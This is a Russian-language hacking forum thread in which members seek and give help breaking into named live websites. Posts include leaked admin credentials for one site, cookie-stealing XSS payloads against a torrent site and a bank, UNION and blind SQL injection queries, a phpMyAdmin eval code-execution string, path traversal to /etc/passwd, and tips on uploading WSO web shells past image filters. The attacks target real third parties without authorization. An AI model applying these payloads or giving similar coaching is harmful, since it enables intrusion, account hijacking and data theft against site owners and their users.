Но если изображение переименовать в test.php то с легкостью загружает.

Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?

Если файл test.php переименовать в test.jpg не пропускает так же...

t0ma5
11.08.2015, 20:52
OxoTnik said:
↑ (https://antichat.live/posts/3879009/)
http://www.oscar-k.dk/content/index.php?signIn=1


опередил) у него ещё wildcard как то хитро настроен, по идее ещё есть

phpmyadmin.oscar-k.dk

content.oscar-k.dk

ftp://ftp.oscar-k.dk

ocheretko
11.08.2015, 20:53
Muracha said:
↑ (https://antichat.live/posts/3879019/)
В админке сайта есть скрипт elFinder.
Пытаюсь через него загрузить php файл.
Скрипт, походу, читает заголовки mime т.к.
Файлы типа .php и html не пропускает. Если создать простейший скрипт аля
не пропустит.
Но если изображение переименовать в test.php то с легкостью загружает.
Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?
Если файл test.php переименовать в test.jpg не пропускает так же...


Проверьте, не фильтрует ли конструкцию

Muracha
11.08.2015, 21:11
Он фильтрует не содержимое файла, без разницы что там, eval или echo.

Он фильтрует заголовки

код типа пропустил но выполнить не удалось


Code:
‰PNG

IHDR ђwSЮ pHYs љњ tIMEЯ
’ьdп IDATЧcшяя? ююЬМYз IEND®B`‚

blackhead
11.08.2015, 21:14
OxoTnik said:
↑ (https://antichat.live/posts/3879009/)
http://www.oscar-k.dk/content/index.php?signIn=1


Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((

PS

Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?

OxoTnik
11.08.2015, 23:00
софт со своим словарём.


blackhead said:
↑ (https://antichat.live/posts/3879038/)
Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((
PS
Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?

t0ma5
12.08.2015, 15:40
blackhead said:
↑ (https://antichat.live/posts/3879038/)
Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((
PS
Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?


http://content.oscar-k.dk/index.php?signIn=1

seba:12345

Chudak
12.08.2015, 17:25
XAMEHA said:
↑ (https://antichat.live/posts/3878691/)
Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы


Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!

blackhead
12.08.2015, 22:08
t0ma5 said:
↑ (https://antichat.live/posts/3879290/)
http://content.oscar-k.dk/index.php?signIn=1
seba:12345


Спасибо, но хотелось бы знать что откуда. Если не трудно хотя-бы вкратце - как найти админку и откуда seba:12345 (в базе я нашел только юзера oscar).

Octavian
13.08.2015, 02:08
нашол такую хсс при нажатие в правом углу на закрытие появляется алерт

http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+document.cookie)+'&lang=ro (http://www.torrentsmd.com/smilies_popup.php?text=3&container=%27%2Balert(+document.cookie)%2B%27&lang=ro)

где типерь запихнуть сылку сниффера помоги пожалуста

http://hacker-lab.com/sniffer/images/251095_3.jpg

XAMEHA
13.08.2015, 02:23
Chudak said:
↑ (https://antichat.live/posts/3879334/)
Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!




Code:
place=1')sub2 WHERE 1.0Union/*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,1 8,19,20--+

Инъекция в table_references.

Sensoft
13.08.2015, 03:16
ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд

DATABASE HOSTNAME - есть

DATABASE USERNAME - есть

DATABASE PASSWORD - есть

DATABASE NAME - есть

DATABASE PORT - есть

И ещё асякие конфигурации там вроде даже есть привязка по IP адресам

Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)

OxoTnik
13.08.2015, 12:27
Sensoft said:
↑ (https://antichat.live/posts/3879509/)
ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
DATABASE HOSTNAME - есть
DATABASE USERNAME - есть
DATABASE PASSWORD - есть
DATABASE NAME - есть
DATABASE PORT - есть
И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)


Серьёзная уязвимость, можно управлять БД, залить шелл, в общем что угодно сделать с сайтом.

montag52
13.08.2015, 12:35
Sensoft said:
↑ (https://antichat.live/posts/3879509/)
ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
DATABASE HOSTNAME - есть
DATABASE USERNAME - есть
DATABASE PASSWORD - есть
DATABASE NAME - есть
DATABASE PORT - есть
И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)


А какая СУБД?

Если MySQL, например, то не забудь про UDF функции, при помощи которых можно замутить RCE от имени пользователя СУБД на уровне ОС.

Sensoft
13.08.2015, 16:07
В общем вот сайт http://www.tvzavr.ru/

Netsparker показывает уязвимости Netsparker

Cookie Not Marked as Secure

Cross-site Scripting -

.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A) (http://www.tvzavr.ru/filmy?sort=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00052A)%3C/scRipt%3E)

Parameter Name sort

Parameter Type GET

Attack Pattern '"-->netsparker(0x00052A)
Можно как нибудь слить BD или накасячить на сайте ?

frank
13.08.2015, 17:34
'nj


Sensoft said:
↑ (https://antichat.live/posts/3879643/)
В общем вот сайт
http://www.tvzavr.ru/
Netsparker показывает уязвимости Netsparker
Cookie Not Marked as Secure

Cross-site Scripting -


.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A) (http://www.tvzavr.ru/filmy?sort=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00052A)%3C/scRipt%3E)


.SpoilerTarget" type="button">Spoiler: Отчёт
Parameter Name sort

Parameter Type GET

Attack Pattern '"-->netsparker(0x00052A)
Можно как нибудь слить BD или накасячить на сайте ?




это означает что куки не имеют флага http-only, что означает возможность угона, в том числе авторизационной куки, если такая есть там, в случае наличия XSS уязвимости, с помощью JS скрипта.

Надеюсь достаточно полно получилось объяснить, если нет. прошу коллег подправить.

Что, захотелось себе на телевизор каналов бесплатно? не советую, так себе сервис и каналы не очень Это относительно самого сообщения.

То что под спойлером, похоже на указание наличия XSS, судя по всему отраженному.

faza02
13.08.2015, 17:36
Sensoft said:
↑ (https://antichat.live/posts/3879643/)
В общем вот сайт
http://www.tvzavr.ru/
Netsparker показывает уязвимости Netsparker
Cookie Not Marked as Secure

Cross-site Scripting -


.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A) (http://www.tvzavr.ru/filmy?sort=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00052A)%3C/scRipt%3E)


.SpoilerTarget" type="button">Spoiler: Отчёт
Parameter Name sort

Parameter Type GET

Attack Pattern '"-->netsparker(0x00052A)

Можно как нибудь слить BD или накасячить на сайте ?




для начала стоит прочитать что это за уязвимость и что позволяет сделать

wkar
14.08.2015, 04:02
есть blind boolean based sql inj в поле авторизации

база - Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0

название базы достает, таблицы, колонки достает, а данные не хочет.

Помогите составить запрос.

' or ASCII(CAST(SUBSTRING((SELECT TOP 1 Login FROM Users),1,1) AS VARCHAR(8000)))>1-- ->false =не работает

Как достать данные?

Спасибо.

wkar
14.08.2015, 04:07
wkar said:
↑ (https://antichat.live/posts/3879891/)
есть blind boolean based sql inj в поле авторизации
база - Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0
название базы достает, таблицы, колонки достает, а данные не хочет.
Помогите составить запрос.
' or ASCII(CAST(SUBSTRING((SELECT TOP 1 Login FROM Users),1,1) AS VARCHAR(8000)))>1-- ->false =не работает
Как достать данные?
Спасибо.


Походу колонка логин пуста о_О, потому что

ASCII(CAST(SUBSTRING((SELECT TOP 1 customer_type FROM Users),1,1) AS VARCHAR(8000)))>1-- -> TRUE

И там там только одна запись

Почему с остальных колонок не достает инфу ?

qaz
14.08.2015, 11:21
http://cubinfo.mobi/view.php?id=616662','(select+version())

можно как-то инфу вывести?

Br@!ns
14.08.2015, 11:51
qaz said:
↑ (https://antichat.live/posts/3879953/)
http://cubinfo.mobi/view.php?id=616662','(select+version())
можно как-то инфу вывести?




http://higgs.rghost.ru/6L4wxnzKL/image.png

DJ ][akep
15.08.2015, 07:34
Есть код подруба языка


PHP:
include('languages/'.$_GET['lang'].'/index.php');

По дерикториям прыгать получается ?lang=en/../../ - такой запрос инклудит индексный файл в корне сайта), нулёвый байт не прокатит из за версии php

Может есть какие-то идейки?)

faza02
15.08.2015, 12:17
ну как бы альтернатива нульбайта из /././././[4096]./.

Genius Black
15.08.2015, 14:03
Подскажите на какой хостинг можно залить шелл, чтобы вставить его в Remove file Inclusion

Muracha
15.08.2015, 20:02
Есть скрипт с уязвимой админ-панелью. Как правильно составить запрос, чтобы авторизоваться?

--

Убрано

--

Muracha
15.08.2015, 20:19
Уязвимость в стиле "admin" or 1=1/*

В коде присутствует проверка и на сессии, Через get запрос я пытался.

То есть как правильнее подставить запрос "admin or 1=1/*" и почему это работает так, а не как то иначе?

XAMEHA
15.08.2015, 20:23
Muracha (https://forum.antichat.net/members/169610/), SQL-инъекция в пределах этого кода в настоящее время не эксплуатационна. Возможно наличие хранимой XSS, через неё зайти реально.

wkar
15.08.2015, 23:34
Genius Black said:
↑ (https://antichat.live/posts/3880400/)
Подскажите на какой хостинг можно залить шелл, чтобы вставить его в Remove file Inclusion


ttp://www.uploadedit.com/_to-upload-documents-onto-internet-PLAIN-TEXT-TXT-hosting.htm (http://www.uploadedit.com/_to-upload-documents-onto-internet-PLAIN-TEXT-TXT-hosting.htm)

smak
16.08.2015, 20:40
глупый вопрос можно) например есть уязвимый сайт к скл инжекшен) нашел ее, просмотрел таблицы нашел логин и пасс сисадмина)

к фтп он не подходит, можно как то к базе через kali linux подключится с этим логином и паролем? доступ к sql shell есть если что

ocheretko
16.08.2015, 22:11
Скорее всего логин и пасс от админ панели. Админ панель нужно найти, например, можно воспользоваться программой для поиска админки.

Что за sql shell доступ у Вас есть?

smak
16.08.2015, 22:20
обычного юзера, который особо не имеет прав только читает данные таблиц. к админке пасс не подошел) там помоему скрипт нерабочий, а так админок нету пхпмайадмин тоже не нашел

lдиректории пробовал найти и через модуль websploit и через inuscan одна админка accaunts ито нерабочая, ну пасс не подошел, сайт просто исламский чтото интересно стало)

ocheretko
17.08.2015, 03:08
Может быть у кого-то получится обойти WAF


Code:
https://www.banki.ru/news/bankimail/subscribe/?a=0&email=" type=text autofocus onfocus=alert() id=">

Muracha
17.08.2015, 07:11
Как составить запрос в sqlmap, чтобы он брал строку из файла и проверял каждую персонально без обращение к google? аналог

python sqlmap.py - g

XAMEHA
17.08.2015, 10:44
ocheretko said:
↑ (https://antichat.live/posts/3881069/)
Может быть у кого-то получится обойти WAF

Code:
https://www.banki.ru/news/bankimail/subscribe/?a=0&email=" type=text autofocus onfocus=alert() id=">



ocheretko,Сервер банит IP. О таком надо предупреждать.

smak
18.08.2015, 15:50
можно вопрос нашел уязвимый сайт , там blind sql injection

он медленно подбирает таблицы видимо вслепую) поставил для перебора количество потоков равным 10

current user is dba :true (база оракле)

пытаюсь запустать скл шелл пишет operation system shell functionality not yet implemented for oracle)

чтото можно сделать?) ато там баз много и юзеров баз много до пенсии будет перебирать )

nik1201
18.08.2015, 17:11
Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?

Вот мой base.php


Code:

Вот сам submit

И так обращяюсь к submit.
document.getElementById('lsform').action="http://мойхост.ru/base.php?";

zifus
18.08.2015, 20:10
Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9

server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461a58c9&cmd=phpinfo();

Сплоит не работает , ответ

SQL-запрос:

SELECT `information_schema`.`SCHEMATA` . *

FROM `information_schema`.`SCHEMATA`

GROUP BY BINARY `information_schema`.`SCHEMATA`.`SCHEMA_NAME`

ORDER BY BINARY `"]) OR eval($_REQUEST[cmd]); //` DESC

Ответ MySQL:

#1054 - Unknown column '"]) OR eval($_REQUEST[cmd]); //' in 'order clause'

как раскрутить помогите и сильно не ругайте я только начинаю.

XAMEHA
19.08.2015, 12:17
nik1201 said:
↑ (https://antichat.live/posts/3881679/)
Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?
Вот мой base.php


Как выглядит XSS и где она?


zifus said:
↑ (https://antichat.live/posts/3881743/)
Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9
Сплоит не работает , ответ


Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.

zifus
19.08.2015, 13:00
XAMEHA said:
↑ (https://antichat.live/posts/3881974/)
Как выглядит XSS и где она?
Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.


Мне нужно залить шелл на сайт.. В PMA Нет привилегий..

3nvY
19.08.2015, 18:46
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd

Подскажите как можно обойти.

smirk
19.08.2015, 23:14
3nvY said:
↑ (https://antichat.live/posts/3882149/)

Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd

Подскажите как можно обойти.




Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php

404 как бэ, да и плюс http://bit.ly/1J4XXyF уже сломали переломали

Pro100Nyan
20.08.2015, 01:58
Что то есть?


Code:
http://riot.mail.ru/info/news/index.php?show=dat&date=12082015'

zifus
21.08.2015, 12:42
Что можно с этого поиметь...


exception 'Exception' with message 'Disabled' in /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_theme.php:1019 Stack trace: #0 [internal function]: template_preprocess_theme_wallet_info(Array, 'theme_wallet_in...') #1 /var/www/vhosts//includes/theme.inc(710): call_user_func_array('template_prepro...', Array) #2 /tmp/tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u5 4jkaA.php(25): theme('theme_wallet_in...') #3 /var/www/vhosts//themes/engines/phptal/PHPTAL.php(675): tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u5 4jkaA(Object(PHPTAL), Object(PHPTAL_Context)) #4 /var/www/vhosts//themes/engines/phptal/phptal.engine(86): PHPTAL->execute() #5 /var/www/vhosts//includes/theme.inc(738): phptal_render_template('sites/all/modul...', Array) #6 /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_room.php(1273): theme('apparat_select') #7 /var/www/vhosts//sites/all/modules/custom/casino/casino.module(318): ctrl_room->http_apparat(Array) #8 [internal function]: casino_menu_callback('room', 'apparat') #9 /var/www/vhosts//includes/menu.inc(350): call_user_func_array('casino_menu_cal...', Array) #10 /var/www/vhosts//index.php(53): menu_execute_active_handler() #11 {main}

There is a problem with the phptal theme engine Please refer to the documentation on the PHPTAL project page (http://drupal.org/project/phptal).

zifus
21.08.2015, 13:05
Есть сайт на Drupal в загрузку картинок заливаю shell.php%00ipg заливается.Пробовал ище в коментах exif мини-шелл прописать. Но меняет имя файла, иду по адресу файла открываю и ничего не происходит.

Как я понял стоит imagecache drupal можна вообще таким способом залить шелл или мини-шелл?

Ище фильтрация на сайте

Emphasized Emphasized Emphasized

Strong Strong Strong

Cited Cited Cited

Coded text used to show programming source code Coded Coded

Character Description You Type You Get

Ampersand & &

Greater than > >

Less than <

CluboK
26.08.2015, 18:01
Не получается залить шелл .

Вообщем есть админка на сайте.Админка самописная.

Картинки можно заливать .jpg .png .gif ,остальные расширения нельзя, выдаёт ошибки которые появляются прямо в самой админке .

.SpoilerTarget" type="button">Spoiler: Вот ошибки
Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 75

Warning: Division by zero in /home/*******/*******/admin/gdResizer.php on line 227

Warning: Division by zero in /home/*******/*******.ru/admin/gdResizer.php on line 228

Warning: imagecreatetruecolor(): Invalid image dimensions in /home/*******/*******.ru/admin/gdResizer.php on line 241

Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /home/*******/*******.ru/admin/gdResizer.php on line 250

Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 107
Пытаюсь залить шелл с расширением .jpg или .png или .gif тоже ошибки .

Пробую Shell.php.jpg не катит,даже с %0 .

Пробую через Image Manager,выбираю файл shell.php,пишет файл загружен,но его там нет .

Пробовал даже .htacces залить,и то не помогает .

Есть возможность писать отзывы .

Пишу в строку "Автор" - '(кавычку,одинарную),пишу текст,буква d . Вылезает это You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd','2015-08-26 16:58:08')' at line 1 .

А что дальше с SQL делать не знаю . Остальные запросы блокирует . Видимо некоторые символы блокирует .

На заметку : сайт на .html .

Помогите,а то уже нет сил .

ocheretko
26.08.2015, 22:31
Есть sql иньекция - раскручивайте. Может быть будут права через базу залить шелл.

Ваш загружаемый файл обрабатывается с помощью библиотеки GD - библиотека php для работы с графическими файлами. Она создает новое корректное изображение с уже существующего. Думаю не получится загрузить другой файл кроме картинки. Просто на сайте нет обработчика ошибок, и включен вывод ошибок

То, что сайт на html ничего не значит. Если Вы получили сообщение об ошибке mysql уже заслуживает внимание и может рассматриваться как потенциальная уязвимость.

P.S. И дай Вам бог сил. В нашей работе - главное терпение

zifus
27.08.2015, 17:53
Помогите разобраться с OpenCart 1.5.4.1

http://www.slideshare.net/DefconRussia/reutov-yunusov-nagibin-random-numbers-take-ii с страницы 46

как я понял нужно скомпилировать на стр 49

Вообще может есть какая то инфа то OpenCart 1.5.4.1

WallHack
27.08.2015, 20:46
Возможно ли раскрутить Фрагментированную SQL инъекцию

Отсутствие фильтрации символа обратного слэша \

http://fortunae-filius.ru/reg.htm

BabaDook
28.08.2015, 13:08
Muracha said:
↑ (https://antichat.live/posts/3881082/)
Как составить запрос в sqlmap, чтобы он брал строку из файла и проверял каждую персонально без обращение к google? аналог
python sqlmap.py - g


sqmap -m путь в файлу

SaNDER
28.08.2015, 13:31
Заливаю Shell WSO через админку .

Shell заливал в /news .

Составил линку http://********.com/upload/news/wso2.php

Вылезает вот это :

http://s018.radikal.ru/i502/1508/f9/3e47213a616d.png

faza02
28.08.2015, 13:43
SaNDER said:
↑ (https://antichat.live/posts/3885203/)
Заливаю Shell WSO через админку .
Shell заливал в /news .
Составил линку
http://********.com/upload/news/wso2.php
Вылезает вот это :
http://s018.radikal.ru/i502/1508/f9/3e47213a616d.png


опробуйте pas

winstrool
28.08.2015, 13:59
yarbabin said:
↑ (https://antichat.live/posts/3885208/)
опробуйте pas


Тут pas не поможет, это php расширение интерпретируется как html код, нужно пробывать играться с расширением или путь выше искать...

winstrool
28.08.2015, 14:21
SaNDER said:
↑ (https://antichat.live/posts/3885217/)
Шелл залился . Пароль узнал,да только он всё равно заходить не желает .


т.е идет выполнение как PHP? если да, то сделайте шелл без пароля!